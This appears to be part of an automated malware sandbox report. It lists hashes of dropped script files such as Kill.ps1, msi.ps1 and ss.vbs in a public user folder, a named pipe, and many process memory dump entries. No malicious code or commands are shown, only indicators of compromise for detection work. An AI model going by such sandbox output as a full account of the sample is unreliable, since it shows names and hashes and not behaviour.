2d46fdb99392f85a47e1bf465f8948d1af139fda4176b3f058ad9f079a781a2167a2e7480883517cb01cb2bb675bd7dcb5f285cd957439c9119c5407fd209411

Download Submit
C:\Users\Public\Kill.ps1
MD5
2e1021023713f80d3d233d4a9467e6b2

SHA1
94ae0dd1fccbed177d354e39e99737293900b28a

SHA256
d532e0ef22db774861c441769b16edfc9df1e055423fcda74230d774ce09370a

SHA512
e9599bb5fc8766cf259dab6eaf7802f3be9a0a7da347cf93e8616d4239ef37a7d7eecb9f48d46498f4f6522cb2aa6bd2897bd8a7476c86913dc8247ddf8ace7f

Download Submit
C:\Users\Public\msi.ps1
MD5
ef299b25d1e217c84ba708b7b2697f21

SHA1
ecf50d1c5bfbbd8db4a193627d1f936804689b24

SHA256
9a4d9ba7cbf3e5d1a856805a9b797d8ea29b65aefc9f7f6529ec488bdb96bba4

SHA512
c57450d68262f9f600b427d909ad1e753445c474224d637f15494fd8b0ba17b5ccf1a1440a32c2d8d7c0d6e95a6f14cc9a8e9ca8427a4ed6978692afa36ff46b

Download Submit
C:\Users\Public\ss.vbs
MD5
98f69749329ccb2ee8d69288e04f2332

SHA1
3a8477b107a52cd0b96961d0666cf07ae5045d76

SHA256
771780d15b72c2d35c069cf0e7e53346f14ea6078609e7be090b5249bd040556

SHA512
372e0766f7ca026893720b42de5d34ef667723a0519210977c9ea5af275e6c82dfa3743b69e5cfeba529f9f90e1ca51644b20cfc63f9996a5450cd3da10244cf

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/484-111-0x0000000002780000-0x0000000002782000-memory.dmp

Filesize
8KB

Download
memory/484-112-0x0000000002784000-0x0000000002786000-memory.dmp

Filesize
8KB

Download
memory/484-105-0x0000000000000000-mapping.dmp

Download
memory/560-124-0x0000000000000000-mapping.dmp

Download
memory/560-130-0x000000001AD64000-0x000000001AD66000-memory.dmp

Filesize
8KB

Download
memory/560-129-0x000000001AD60000-0x000000001AD62000-memory.dmp

Filesize
8KB

Download
memory/752-191-0x0000000000000000-mapping.dmp

Download
memory/752-193-0x000000001AB20000-0x000000001AB22000-memory.dmp

Filesize
8KB

Download
memory/752-194-0x000000001AB24000-0x000000001AB26000-memory.dmp

Filesize
8KB

Download
memory/952-121-0x00000000024C0000-0x00000000024C2000-memory.dmp

Filesize
8KB

Download
memory/952-122-0x00000000024C4000-0x00000000024C6000-memory.dmp

Filesize
8KB

Download
memory/952-115-0x0000000000000000-mapping.dmp

Download
memory/968-181-0x0000000000000000-mapping.dmp

Download
memory/1000-168-0x000000001ACA4000-0x000000001ACA6000-memory.dmp

Filesize
8KB

Download
memory/1000-160-0x0000000000000000-mapping.dmp

Download
memory/1000-167-0x000000001ACA0000-0x000000001ACA2000-memory.dmp

Filesize
8KB

Download
memory/1000-171-0x000000001AB30000-0x000000001AB31000-memory.dmp

Filesize
4KB

Download
memory/1100-60-0x000007FEFC661000-0x000007FEFC663000-memory.dmp

Filesize
8KB

Download
memory/1192-187-0x000000001AB34000-0x000000001AB36000-memory.dmp

Filesize
8KB

Download
memory/1192-183-0x0000000000000000-mapping.dmp

Download
memory/1192-186-0x000000001AB30000-0x000000001AB32000-memory.dmp

Filesize
8KB

Download
memory/1224-91-0x000000001AB94000-0x000000001AB96000-memory.dmp

Filesize
8KB

Download
memory/1224-90-0x000000001AB90000-0x000000001AB92000-memory.dmp

Filesize
8KB

Download
memory/1224-84-0x0000000000000000-mapping.dmp

Download
memory/1336-155-0x0000000000000000-mapping.dmp

Download
memory/1392-190-0x0000000000000000-mapping.dmp

Download
memory/1480-71-0x0000000000000000-mapping.dmp

Download
memory/1556-79-0x000000001AC40000-0x000000001AC42000-memory.dmp

Filesize
8KB

Download
memory/1556-74-0x0000000000000000-mapping.dmp

Download
memory/1556-80-0x000000001AC44000-0x000000001AC46000-memory.dmp

Filesize
8KB

Download
memory/1576-158-0x000000001AA64000-0x000000001AA66000-memory.dmp

Filesize
8KB

Download
memory/1576-157-0x000000001AA60000-0x000000001AA62000-memory.dmp

Filesize
8KB

Download
memory/1576-145-0x0000000000000000-mapping.dmp

Download
memory/1728-189-0x0000000000000000-mapping.dmp

Download
memory/1840-196-0x0000000000000000-mapping.dmp

Download
memory/1840-198-0x0000000002480000-0x0000000002481000-memory.dmp

Filesize
4KB

Download
memory/1908-142-0x000000001AC44000-0x000000001AC46000-memory.dmp

Filesize
8KB

Download
memory/1908-141-0x000000001AC40000-0x000000001AC42000-memory.dmp

Filesize
8KB

Download
memory/1908-135-0x0000000000000000-mapping.dmp

Download
memory/1984-156-0x0000000000000000-mapping.dmp

Download
memory/2012-195-0x000000000040D09E-mapping.dmp

Download
memory/2012-176-0x000000001AB00000-0x000000001AB02000-memory.dmp

Filesize
8KB

Download
memory/2012-174-0x0000000000000000-mapping.dmp

Download
memory/2012-177-0x000000001AB04000-0x000000001AB06000-memory.dmp

Filesize
8KB

Download
memory/2012-197-0x0000000000510000-0x0000000000511000-memory.dmp

Filesize
4KB

Download
memory/2032-182-0x0000000000000000-mapping.dmp

Download
memory/2032-102-0x000000001AE64000-0x000000001AE66000-memory.dmp

Filesize
8KB

Download
memory/2032-101-0x000000001AE60000-0x000000001AE62000-memory.dmp

Filesize
8KB

Download
memory/2032-95-0x0000000000000000-mapping.dmp

Download
memory/2040-70-0x000000001C090000-0x000000001C091000-memory.dmp

Filesize
4KB

Download
memory/2040-66-0x000000001A9D0000-0x000000001A9D2000-memory.dmp

Filesize
8KB

Download
memory/2040-67-0x000000001A9D4000-0x000000001A9D6000-memory.dmp

Filesize
8KB

Download
memory/2040-65-0x00000000026A0000-0x00000000026A1000-memory.dmp

Filesize
4KB

Download
memory/2040-64-0x000000001AA50000-0x000000001AA51000-memory.dmp

Filesize
4KB

Download
memory/2040-68-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/2040-63-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/2040-69-0x000000001B620000-0x000000001B621000-memory.dmp

Filesize
4KB

Download
memory/2040-61-0x0000000000000000-mapping.dmp

Download